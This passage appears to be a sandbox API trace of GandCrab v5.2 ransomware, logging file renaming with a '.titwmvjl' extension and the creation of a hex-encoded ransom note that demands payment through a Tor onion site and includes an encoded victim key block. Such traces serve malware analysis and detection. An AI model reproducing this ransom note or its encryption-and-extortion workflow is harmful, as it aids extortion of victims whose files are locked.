returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a09d2ca4deb61a.lock" [0085.989] lstrlenW (lpString=".titwmvjl") returned 9 [0085.989] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a09d2ca4deb61a.lock") returned 68 [0085.990] VirtualAlloc (lpAddress=0x0, dwSize=0xc8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.990] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 77 [0085.990] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a09d2ca4deb61a.lock") returned 68 [0085.990] lstrlenW (lpString=".lock") returned 5 [0085.990] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.990] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0085.990] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.990] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.990] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0085.990] lstrcmpW (lpString1="RootTools", lpString2=".") returned 1 [0085.990] lstrcmpW (lpString1="RootTools", lpString2="..") returned 1 [0085.990] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\", lpString2="RootTools" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools" [0085.990] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\" [0085.991] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0085.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0085.991] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0085.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0085.991] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0085.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0085.991] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0085.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0085.991] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0085.991] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.992] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.992] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\\\TITWMVJL-DECRYPT.txt") returned 75 [0085.992] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\roottools\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0085.992] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\